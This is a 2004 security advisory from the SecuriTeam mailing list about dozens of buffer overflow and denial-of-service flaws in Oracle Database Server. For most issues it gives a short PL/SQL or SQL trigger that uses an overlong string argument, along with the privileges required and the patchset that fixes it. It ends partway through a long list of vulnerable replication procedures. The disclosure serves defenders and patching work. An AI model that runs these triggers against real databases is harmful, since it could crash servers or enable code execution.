Network Security: Detailed info on [NEWS] Multiple Vulnerabilities in Oracle Database Server (40 Issues)

Subject:	[NEWS] Multiple Vulnerabilities in Oracle Database Server (40 Issues)
Date:	2 Sep 2004 12:40:56 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Multiple Vulnerabilities in Oracle Database Server (40 Issues)
------------------------------------------------------------------------


SUMMARY

Multiple buffer overflow and denial of service (DoS) vulnerabilities exist 
in the Oracle Database Server that allow database users to take complete 
control over the database and optionally cause denial of service.

DETAILS

Please follow the links for details of the vulnerabilities:
#1 - Buffer overflow in public procedure DROP_SITE_INSTANTIATION of 
DBMS_REPCAT_INSTANTIATE package
Oracle Database Server provides the DBMS_REPCAT_INSTANTIATE package that 
can be used in replicated environments to manage the instantiation of 
deployment templates. This package contains a public procedure 
DROP_SITE_INSTANTIATION that is used to remove a template instantiation at 
a target site. When this procedure is called with a long string in the 
first parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
DBMS_REPCAT_INSTANTIATE.DROP_SITE_INSTANTIATION ('longstring','');
END;

Analysis:
By default DBMS_REPCAT_INSTANTIATE has EXECUTE permission to PUBLIC so any 
Oracle database user can exploit this vulnerability.

Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#2 - Buffer overflow in public function INSTANTIATE_OFFLINE of 
DBMS_REPCAT_INSTANTIATE package
Details: 
Oracle Database Server provides the DBMS_REPCAT_INSTANTIATE package that 
can be used in replicated environments to manage the instantiation of 
deployment templates. This package contains a public function 
INSTANTIATE_OFFLINE that is used to generate a script at the master site 
to create the materialized view environment at the remote materialized 
view site while offline. When this function is called with a long string 
in the first parameter a buffer overflow occurs.

To reproduce the overflow, execute the next SQL:

SELECT DBMS_REPCAT_INSTANTIATE.INSTANTIATE_OFFLINE ('longstring','') FROM 
Dual

or

DECLARE
a NUMBER;
BEGIN
a := DBMS_REPCAT_INSTANTIATE.INSTANTIATE_OFFLINE('longstring','');
END;

Analysis:
By default DBMS_REPCAT_INSTANTIATE has EXECUTE permission to PUBLIC so any 
Oracle database user can exploit this vulnerability.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix: 
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#3 - Buffer overflow in public function INSTANTIATE_ONLINE of 
DBMS_REPCAT_INSTANTIATE package
Details:
Oracle Database Server provides the DBMS_REPCAT_INSTANTIATE package that 
can be used in replicated environments to manage the instantiation of 
deployment templates. This package contains a public function 
INSTANTIATE_ONLINE that is used to generate a script at the master site to 
create the materialized view environment at the remote materialized view 
site while online. When this function is called with a long string in the 
first parameter a buffer overflow occurs.

To reproduce the overflow, execute the next SQL:

SELECT DBMS_REPCAT_INSTANTIATE.INSTANTIATE_ONLINE ('longstring','') FROM 
Dual

Analysis:
By default DBMS_REPCAT_INSTANTIATE has EXECUTE permission to PUBLIC so any 
Oracle database user can exploit this vulnerability
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#4 - Buffer overflow on "gname" parameter on procedures of Replication 
Management API Packages
Details:
Oracle Database Server provides a set of packages that can be used to 
administer a replicated environment. Some procedures of these packages use 
the parameter "gname" to specify a group name. When a long string is 
passed to this parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
DBMS_REPCAT.DROP_MASTER_REPGROUP ('longstring');
END;

or

BEGIN
DBMS_REPCAT.ALTER_MVIEW_PROPAGATION ('longstring', '');
END;

or

BEGIN
DBMS_OFFLINE_OG.BEGIN_LOAD ('longstring', 'x');
END;

or

BEGIN
DBMS_OFFLINE_SNAPSHOT.END_LOAD ('longstring', 'x',\u2019d\u2019);
END;

etc.

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA roles, and users granted execute permissions on the vulnerable 
packages.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#5 - Buffer overflow on "sname" and "oname" parameters on procedures of 
DBMS_REPCAT package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used 
to administer and update the replication catalog and environment. Some 
procedures of this package use the parameters "sname" to specify a schema 
name and "oname" to specify an object name. When a long string is passed 
to any of these parameters a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
DBMS_REPCAT.ADD_GROUPED_COLUMN ('longstring', 'longstring', 'cc','dd');
END;

or

BEGIN
DBMS_REPCAT.ADD_DELETE_RESOLUTION ('longstring', 'longstring', 0, '', '');
END;

or

BEGIN
DBMS_REPCAT.CANCEL_STATISTICS ('longstring', 'longstring');
END;

etc.

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA roles and users granted execute permissions on the DBMS_REPCAT 
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#6 - Buffer overflow on "type" parameter on procedures of DBMS_REPCAT 
package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used 
to administer and update the replication catalog and environment. Some 
procedures of this package use the parameter "type" to specify the type of 
the object being referenced in other parameters. When a long string is 
passed to this parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
DBMS_REPCAT.ALTER_MASTER_REPOBJECT ('', '', 'longstring', 'dd', 'ee', 
false,false);
END;

or

BEGIN< DBMS_REPCAT.COMMENT_ON_REPOBJECT ('', '', 'longstring', '');
END;

or

BEGIN
DBMS_REPCAT.DROP_MASTER_REPOBJECT ('aa', 'bb', 'longstring');
END;

etc.

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA roles, and users granted execute permissions on the DBMS_REPCAT 
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#7 - Buffer overflow on "gowner" parameter on procedures of the 
DBMS_REPCAT package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used 
to administer and update the replication catalog and environment. Some 
procedures of this package use the parameter "gowner" to specify the owner 
of the materialized view group. When a long string is passed to this 
parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
DBMS_REPCAT.DROP_MVIEW_REPGROUP ('', false, 'longstring');
END;

or

BEGIN
DBMS_REPCAT.REFRESH_MVIEW_REPGROUP ('', false, false, false, 
'longstring');
END;

or

BEGIN
DBMS_REPCAT.REPCAT_IMPORT_CHECK ('longstring', false, 'longstring');
END;

etc.

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA roles, and users granted execute permissions on the DBMS_REPCAT 
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#8 - Buffer overflow on "operation" parameter on procedures of DBMS_REPCAT 
package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used 
to administer and update the replication catalog and environment. Some 
procedures of this package use the parameter "operation" to specify a kind 
data operation ('update', 'delete' or both). When a long string is passed 
to this parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
DBMS_REPCAT.COMPARE_OLD_VALUES ('hr', 'employees', 'employee_id', 
'longstring', true);
END;

or

BEGIN
DBMS_REPCAT.SEND_OLD_VALUES ('hr', 'employees', 
'employee_id','longstring');
END;

etc.

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA roles and users granted execute permissions on the DBMS_REPCAT 
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#9 - Buffer overflow in procedure CREATE_MVIEW_REPGROUP of DBMS_REPCAT 
package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used 
to administer and update the replication catalog and environment. This 
package contains a procedure CREATE_MVIEW_REPGROUP used to create a new 
materialized view group in the local database. When this procedure is 
called with a long string in the fifth parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
DBMS_REPCAT.CREATE_MVIEW_REPGROUP ('', '', '', '', 'longstring', '');
END;

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA roles and users granted execute permissions on DBMS_REPCAT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#10 - Buffer overflow in procedure GENERATE_REPLICATION_SUPPORT of 
DBMS_REPCAT package
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used 
to administer and update the replication catalog and environment. This 
package contains a procedure GENERATE_REPLICATION_SUPPORT used to generate 
the triggers and packages needed to support replication for a specified 
object.
When this procedure is called with a long string in the "package_prefix" 
or "procedure_prefix" parameters a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
DBMS_REPCAT.GENERATE_REPLICATION_SUPPORT ('aa', 'bb', 'TABLE', 
'longstring','longstring', true, 'gg');
END;

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA roles and users granted execute permissions on DBMS_REPCAT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#11 - Buffer overflow in procedures REGISTER_USER_REPGROUP and 
UNREGISTER_USER_REPGROUP of DBMS_REPCAT_ADMIN package
Details:
Oracle Database Server provides the DBMS_REPCAT_ADMIN package that can be 
used to create users with the privileges needed by the symmetric 
replication facility. This package contains the procedures 
REGISTER_USER_REPGROUP and UNREGISTER_USER_REPGROUP used to assign and 
revoke proxy materialized view administrator or receiver privileges at the 
master site or master materialized view site for use with remote sites. 
When this procedure is called with a long string in the "privilege_type" 
parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
DBMS_REPCAT_ADMIN.REGISTER_USER_REPGROUP ('sys', 'longstring', '');
END;

or

BEGIN
DBMS_REPCAT_ADMIN.UNREGISTER_USER_REPGROUP ('sys', 'longstring', '');
END;

Analysis:
This vulnerability can be exploited by users members of 
EXECUTE_CATALOG_ROLE or SYSDBA roles and users granted execute permissions 
on DBMS_REPCAT_ADMIN package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#12 - Buffer overflow in functions INSTANTIATE_OFFLINE, INSTANTIATE_ONLINE 
and procedure DROP_SITE_INSTANTIATION of DBMS_REPCAT_RGT package
Details:
Oracle Database Server provides the DBMS_REPCAT_RGT package that can be 
used to control the maintenance and definition of refresh group templates. 
This package contains the procedures INSTANTIATE_OFFLINE, 
INSTANTIATE_ONLINE and DROP_SITE_INSTANTIATION. When these procedures are 
called with a long string in the "refresh_template_name" or the 
"user_name" parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

SELECT DBMS_REPCAT_RGT.INSTANTIATE_OFFLINE ('longstring', '', '') FROM 
Dual;

or

SELECT DBMS_REPCAT_RGT.INSTANTIATE_ONLINE ('some_refresh_template_name', 
'', 'longstring') FROM Dual;

or

BEGIN
DBMS_REPCAT_RGT.DROP_SITE_INSTANTIATION ('longstring', '', '');
END;

etc.

Analysis:
This vulnerability can be exploited by members of SYSDBA role and users 
granted execute permissions on DBMS_REPCAT_RGT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#13 - Buffer overflow on TEMPFILE parameter
Details:
Oracle Database Server allows specifying temporary files to be used by 
database, when creating or altering a tablespace, altering a database, 
etc. When a long string is passed to TEMPFILE parameter a buffer overflow 
occurs.

To reproduce the overflow, execute the next PL/SQL:

ALTER TABLESPACE TablespaceName ADD TEMPFILE 'longstringhere';

or

CREATE TEMPORARY TABLESPACE TablespaceName TEMPFILE 'longstringhere';

or

ALTER DATABASE TEMPFILE 'longstringhere' online;

or

etc.

Analysis:
This vulnerability can be exploited on ALTER DATABASE by users with the 
ALTER DATABASE system privilege, on CREATE TABLESPACE by users with CREATE 
TABLESPASE system privilege, on ALTER TABLESPACE by users with ALTER 
TABLESPACE system privilege. Exploitation of this vulnerability allows an 
attacker to execute arbitrary code. It can also be exploited to cause DOS 
(Denial of service) killing Oracle server process.

Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.

#14 - Buffer overflow on LOGFILE parameter
Details:
Oracle Database Server allows adding redo log files to be used by 
database, by using alter database statement. When a long string is passed 
to LOGFILE parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

ALTER DATABASE CLEAR LOGFILE 'longstringhere';

or

ALTER DATABASE RECOVER LOGFILE 'longstringhere';

or

ALTER DATABASE DROP LOGFILE MEMBER 'longstringhere';

or

etc.

Analysis:
This vulnerability can be exploited by users with the ALTER DATABASE 
system privilege. Exploitation of this vulnerability allows an attacker to 
execute arbitrary code. It can also be exploited to cause DOS (Denial of 
service) killing Oracle server process.

Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.

#15 - Buffer overflow on CONTROLFILE parameter
Details:
Oracle Database Server allows creation and backup of control files to be 
used later, by issuing alter database statement. When a long string is 
passed to CONTROLFILE parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

ALTER DATABASE BACKUP CONTROLFILE TO 'longstringhere';

or

ALTER DATABASE CREATE STANDBY CONTROLFILE AS'longstringhere';

or

etc.

Analysis:
This vulnerability can be exploited by users with the ALTER DATABASE 
system privilege. Exploitation of this vulnerability allows an attacker to 
execute arbitrary code. It can also be exploited to cause DOS (Denial of 
service) killing Oracle server process.

Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.

#16 - Buffer overflow on FILE parameter
Details:
Oracle Database Server allows to rename data files used by database, by 
using the alter database statement. When a long string is passed to FILE 
parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

ALTER DATABASE RENAME FILE 'longstringhere' TO 'anything';

Analysis:
This vulnerability can be exploited by users with the ALTER DATABASE 
system privilege.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. 10g Not vulnerable.

#17 - Buffer overflow in Interval Conversion Functions
Details:
Oracle Database Server provides two functions that can be used with PL/SQL 
to convert numbers to date/time intervals, when any of these functions are 
called with a long string as a second parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;

SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;

Analysis:
This vulnerability can be exploited by any Oracle Database user because 
access to these functions can't be restricted.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Oracle 9ir2 Patchset 3 (9.2.0.4) Patch 3. 10g Not vulnerable.

#18 - Buffer overflow in String Conversion Function
Details:
Oracle Database Server provides a function that can be used with PL/SQL to 
convert a number or date to a string, when this function is called with 
the function SYSTIMESTAMP (this function returns the system date, 
including fractional seconds and time zone of the database) as a first 
parameter and a long string as a second parameter a buffer overflow 
occurs.

To reproduce the overflow, execute the next PL/SQL:

select TO_CHAR(SYSTIMESTAMP, 'longstringhere') from dual;

Analysis:
This vulnerability can be exploited by any Oracle Database user because 
access to this function can't be restricted.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process. Calling TO_CHAR function with a different value 
than SYSTIMESTAMP function as first parameter seems to not cause a buffer 
overflow, but it shouldn't be discarded that other values could trigger a 
buffer overflow.

Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5) Patch 2. Fixed in 10g Release 1.

#19 - Buffer overflow in CTX_OUTPUT Package Function
Details:
Oracle Database Server provides many packages, one of them called 
CTX_OUTPUT which can be used to log indexing and document service 
requests, has a vulnerable function, when this function is called with a 
long string a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

begin
CTX_OUTPUT.START_LOG('longstringhere');
end;

Analysis:
This vulnerability can be exploited by members of Oracle CTXAPP Role, 
CTXSYS user and users granted execute permissions on CTX_OUTPUT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in latest Oracle 9ir2 Patchset 4 (9.2.0.5) patch 2. 10g not 
vulnerable.

#21 - Buffer overflow on DATAFILE parameter
Details:
Oracle Database Server allows specifying data files where the data will be 
stored when creating a database, altering an index etc. When a long string 
is passed to DATAFILE parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

ALTER DATABASE datafile 'longstringhere' ONLINE;

or

ALTER INDEX indexname allocate extent(datafile 'longstringhere');

or

CREATE TABLESPACE tablespacename DATAFILE 'longstringhere';

or

ALTER CLUSTER clustername allocate extent(datafile 'longstringhere');

or

etc.

Analysis:
This vulnerability can be exploited in many ways:

 1. using ALTER INDEX statement by users who have their own schema and 
users with ALTER ANY INDEX system privilege
 2. using ALTER DATABASE by users with the ALTER DATABASE system privilege
 3. using CREATE TABLESPACE by users with CREATE TABLESPASE system 
privilege
 4. using ALTER CLUSTER by users who have their own schema and users with 
ALTER ANY CLUSTER system privilege

Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in latest Oracle 9ir2 Patchset 4 (9.2.0.5) patch 2. 10g not 
vulnerable.

#22 - Buffer overflow in DBMS_SYSTEM package function
Details:
Oracle Database Server provides many packages. One of them called 
DBMS_SYSTEM can be used to gather information about events set in the 
current session. It can also be used to manipulate other user\u2019s 
sessions and change the values of certain init.ora parameters. It contains 
a vulnerable function which causes buffer overflow when called with a long 
string in the second parameter.

To reproduce the overflow, execute the next PL/SQL:

begin
DBMS_SYSTEM.KSDWRT(2,'longstringhere');
end;

Analysis:
This vulnerability can be exploited by members of SYSDBA role and users 
granted execute permissions on DBMS_SYSTEM package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5). 10g not vulnerable.

#24 - Buffer overflow on "fname" parameter of the DBMS_REPCAT* packages
Details:
Oracle Database Server provides the DBMS_REPCAT package that can be used 
to administer and update the replication catalog and environment. Some 
procedures of this package use the parameter "fname". When a long string 
is passed to this parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

BEGIN
SYS.DBMS_REPCAT_FLA.ENSURE_NOT_PUBLISHED('', 'longstring');
END;

etc.

Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or 
SYSDBA roles, and users granted execute permissions on the DBMS_REPCAT 
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5). 10g not vulnerable.

#25 - Buffer overflow on procedures of the Replication Management API 
packages
Details:
Oracle Database Server provides a set of packages that can be used to 
administer a replicated environment. Some procedures of these packages are 
vulnerable to buffer overflow.

These are the vulnerable procedures:
DBMS_INTERNAL_REPCAT.DISABLE_RECEIVER_TRACE
DBMS_INTERNAL_REPCAT.ENABLE_RECEIVER_TRACE
DBMS_INTERNAL_REPCAT.VALIDATE
DBMS_OFFLINE_OG.BEGIN_FLAVOR_CHANGE
DBMS_OFFLINE_OG.BEGIN_INSTANTIATION
DBMS_OFFLINE_OG.BEGIN_LOAD
DBMS_OFFLINE_OG.END_FLAVOR_CHANGE
DBMS_OFFLINE_OG.END_INSTANTIATION
DBMS_OFFLINE_OG.END_LOAD
DBMS_OFFLINE_OG.RESUME_SUBSET_OF_MASTERS
DBMS_OFFLINE_RGT.ADD_CONFLICT_OFFLINE
DBMS_OFFLINE_RGT.ADD_FLAVOR_OBJECT_OFFLINE
DBMS_OFFLINE_RGT.ADD_GROUPED_COLUMN_OFFLINE
DBMS_OFFLINE_RGT.ADD_INTERNAL_PKG
DBMS_OFFLINE_RGT.ADD_MASTER_OFFLINE
DBMS_OFFLINE_RGT.ADD_PARAMETER_COLUMN_OFFLINE
DBMS_OFFLINE_RGT.ADD_PRIORITY_GROUP_OFFLINE
DBMS_OFFLINE_RGT.ADD_PRIORITY_OFFLINE
DBMS_OFFLINE_RGT.ADD_REPCOLUMN_OFFLINE
DBMS_OFFLINE_RGT.ADD_REPOBJECT_OFFLINE
DBMS_OFFLINE_RGT.ADD_RESOLUTION_OFFLINE
DBMS_OFFLINE_RGT.ADD_SNAPMASTER_OFFLINE
DBMS_OFFLINE_SNAPSHOT.BEGIN_LOAD
DBMS_OFFLINE_SNAPSHOT.END_LOAD
DBMS_RECTIFIER_DIFF.DIFFERENCES
DBMS_RECTIFIER_DIFF.RECTIFY
DBMS_REPCAT.ABORT_FLAVOR_DEFINITION
DBMS_REPCAT.ADD_COLUMN_GROUP_TO_FLAVOR
DBMS_REPCAT.ADD_COLUMNS_TO_FLAVOR
DBMS_REPCAT.ADD_DELETE_RESOLUTION
DBMS_REPCAT.ADD_GROUPED_COLUMN
DBMS_REPCAT.ADD_MASTER_DATABASE
DBMS_REPCAT.ADD_OBJECT_TO_FLAVOR
DBMS_REPCAT.ADD_PRIORITY_CHAR
DBMS_REPCAT.ADD_PRIORITY_DATE
DBMS_REPCAT.ADD_PRIORITY_NCHAR
DBMS_REPCAT.ADD_PRIORITY_NUMBER
DBMS_REPCAT.ADD_PRIORITY_NVARCHAR2
DBMS_REPCAT.ADD_PRIORITY_RAW
DBMS_REPCAT.ADD_PRIORITY_VARCHAR2
DBMS_REPCAT.ADD_SITE_PRIORITY_SITE
DBMS_REPCAT.ADD_UNIQUE_RESOLUTION
DBMS_REPCAT.ADD_UPDATE_RESOLUTION
DBMS_REPCAT.ALTER_MASTER_PROPAGATION
DBMS_REPCAT.ALTER_MASTER_REPOBJECT
DBMS_REPCAT.ALTER_MVIEW_PROPAGATION
DBMS_REPCAT.ALTER_PRIORITY
DBMS_REPCAT.ALTER_PRIORITY_CHAR
DBMS_REPCAT.ALTER_PRIORITY_DATE
DBMS_REPCAT.ALTER_PRIORITY_NCHAR
DBMS_REPCAT.ALTER_PRIORITY_NUMBER
DBMS_REPCAT.ALTER_PRIORITY_NVARCHAR2
DBMS_REPCAT.ALTER_PRIORITY_RAW
DBMS_REPCAT.ALTER_PRIORITY_VARCHAR2
DBMS_REPCAT.ALTER_SITE_PRIORITY
DBMS_REPCAT.ALTER_SITE_PRIORITY_SITE
DBMS_REPCAT.ALTER_SNAPSHOT_PROPAGATION
DBMS_REPCAT.BEGIN_FLAVOR_DEFINITION
DBMS_REPCAT.CANCEL_STATISTICS
DBMS_REPCAT.COMMENT_ON_COLUMN_GROUP
DBMS_REPCAT.COMMENT_ON_DELETE_RESOLUTION
DBMS_REPCAT.COMMENT_ON_MVIEW_REPSITES
DBMS_REPCAT.COMMENT_ON_PRIORITY_GROUP
DBMS_REPCAT.COMMENT_ON_REPGROUP
DBMS_REPCAT.COMMENT_ON_REPOBJECT
DBMS_REPCAT.COMMENT_ON_REPSITES
DBMS_REPCAT.COMMENT_ON_SITE_PRIORITY
DBMS_REPCAT.COMMENT_ON_SNAPSHOT_REPSITES
DBMS_REPCAT.COMMENT_ON_UNIQUE_RESOLUTION
DBMS_REPCAT.COMMENT_ON_UPDATE_RESOLUTION
DBMS_REPCAT.COMPARE_OLD_VALUES
DBMS_REPCAT.CREATE_MASTER_REPGROUP
DBMS_REPCAT.CREATE_MASTER_REPOBJECT
DBMS_REPCAT.CREATE_MVIEW_REPGROUP
DBMS_REPCAT.CREATE_MVIEW_REPOBJECT
DBMS_REPCAT.CREATE_SNAPSHOT_REPGROUP
DBMS_REPCAT.CREATE_SNAPSHOT_REPOBJECT
DBMS_REPCAT.DEFINE_COLUMN_GROUP
DBMS_REPCAT.DEFINE_PRIORITY_GROUP
DBMS_REPCAT.DEFINE_SITE_PRIORITY
DBMS_REPCAT.DO_DEFERRED_REPCAT_ADMIN
DBMS_REPCAT.DROP_COLUMN_GROUP
DBMS_REPCAT.DROP_COLUMN_GROUP_FROM_FLAVOR
DBMS_REPCAT.DROP_COLUMNS_FROM_FLAVOR
DBMS_REPCAT.DROP_DELETE_RESOLUTION
DBMS_REPCAT.DROP_GROUPED_COLUMN
DBMS_REPCAT.DROP_MASTER_REPGROUP
DBMS_REPCAT.DROP_MASTER_REPOBJECT
DBMS_REPCAT.DROP_MVIEW_REPGROUP
DBMS_REPCAT.DROP_MVIEW_REPOBJECT
DBMS_REPCAT.DROP_OBJECT_FROM_FLAVOR
DBMS_REPCAT.DROP_PRIORITY
DBMS_REPCAT.DROP_PRIORITY_CHAR
DBMS_REPCAT.DROP_PRIORITY_DATE
DBMS_REPCAT.DROP_PRIORITY_GROUP
DBMS_REPCAT.DROP_PRIORITY_NCHAR
DBMS_REPCAT.DROP_PRIORITY_NUMBER
DBMS_REPCAT.DROP_PRIORITY_NVARCHAR2
DBMS_REPCAT.DROP_PRIORITY_RAW
DBMS_REPCAT.DROP_PRIORITY_VARCHAR2
DBMS_REPCAT.DROP_SITE_PRIORITY
DBMS_REPCAT.DROP_SITE_PRIORITY_SITE
DBMS_REPCAT.DROP_SNAPSHOT_REPGROUP
DBMS_REPCAT.DROP_SNAPSHOT_REPOBJECT
DBMS_REPCAT.DROP_UNIQUE_RESOLUTION
DBMS_REPCAT.DROP_UPDATE_RESOLUTION
DBMS_REPCAT.EXECUTE_DDL
DBMS_REPCAT.GENERATE_FLAVOR_NAME
DBMS_REPCAT.GENERATE_MVIEW_SUPPORT
DBMS_REPCAT.GENERATE_REPLICATION_PACKAGE
DBMS_REPCAT.GENERATE_REPLICATION_SUPPORT
DBMS_REPCAT.GENERATE_REPLICATION_TRIGGER
DBMS_REPCAT.GENERATE_SNAPSHOT_SUPPORT
DBMS_REPCAT.MAKE_COLUMN_GROUP
DBMS_REPCAT.OBSOLETE_FLAVOR_DEFINITION
DBMS_REPCAT.PUBLISH_FLAVOR_DEFINITION
DBMS_REPCAT.PURGE_FLAVOR_DEFINITION
DBMS_REPCAT.PURGE_MASTER_LOG
DBMS_REPCAT.PURGE_STATISTICS
DBMS_REPCAT.REFRESH_MVIEW_REPGROUP
DBMS_REPCAT.REFRESH_SNAPSHOT_REPGROUP
DBMS_REPCAT.REGISTER_MVIEW_REPGROUP
DBMS_REPCAT.REGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT.REGISTER_STATISTICS
DBMS_REPCAT.RELOCATE_MASTERDEF
DBMS_REPCAT.REMOVE_MASTER_DATABASES
DBMS_REPCAT.RENAME_SHADOW_COLUMN_GROUP
DBMS_REPCAT.REPCAT_IMPORT_CHECK
DBMS_REPCAT.RESUME_MASTER_ACTIVITY
DBMS_REPCAT.SEND_AND_COMPARE_OLD_VALUES
DBMS_REPCAT.SEND_OLD_VALUES
DBMS_REPCAT.SET_COLUMNS
DBMS_REPCAT.SET_LOCAL_FLAVOR
DBMS_REPCAT.SPECIFY_NEW_MASTERS
DBMS_REPCAT.SUSPEND_MASTER_ACTIVITY
DBMS_REPCAT.SWITCH_MVIEW_MASTER
DBMS_REPCAT.SWITCH_SNAPSHOT_MASTER
DBMS_REPCAT.UNREGISTER_MVIEW_REPGROUP
DBMS_REPCAT.UNREGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT.VALIDATE
DBMS_REPCAT.VALIDATE_FLAVOR_DEFINITION
DBMS_REPCAT.VALIDATE_FOR_LOCAL_FLAVOR
DBMS_REPCAT.WAIT_MASTER_LOG
DBMS_REPCAT_ADD_MASTER.SPECIFY_NEW_MASTERS
DBMS_REPCAT_ADMIN.REGISTER_USER_REPGROUP
DBMS_REPCAT_ADMIN.UNREGISTER_USER_REPGROUP
DBMS_REPCAT_AUTH.GRANT_SURROGATE_REPCAT
DBMS_REPCAT_AUTH.REVOKE_SURROGATE_REPCAT
DBMS_REPCAT_CONF.ADD_DELETE_RESOLUTION
DBMS_REPCAT_CONF.ADD_GROUPED_COLUMN
DBMS_REPCAT_CONF.ADD_PRIORITY_CHAR
